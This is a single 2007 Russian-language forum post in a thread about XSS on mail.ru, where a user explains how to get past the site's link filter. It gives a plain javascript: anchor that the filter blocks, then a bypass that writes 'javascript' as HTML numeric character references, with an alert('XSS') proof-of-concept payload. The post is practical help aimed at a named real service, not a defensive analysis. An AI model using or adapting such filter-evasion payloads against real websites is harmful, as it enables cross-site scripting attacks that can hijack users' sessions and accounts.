Тема: XSS на mail.ru
Показать сообщение отдельно

  #11  
Старый 22.08.2007, 14:30
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию

2Skaret
Фишка то в том, чтоб обойти фильтр. В незашифрованном виде код такой:
<a href=javascript:alert('XSS')>Текст</a>
Но такой код не выполнится, поэтому нужен такой:
<a href=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:alert('XSS')>Текст</a>

 
Ответить с цитированием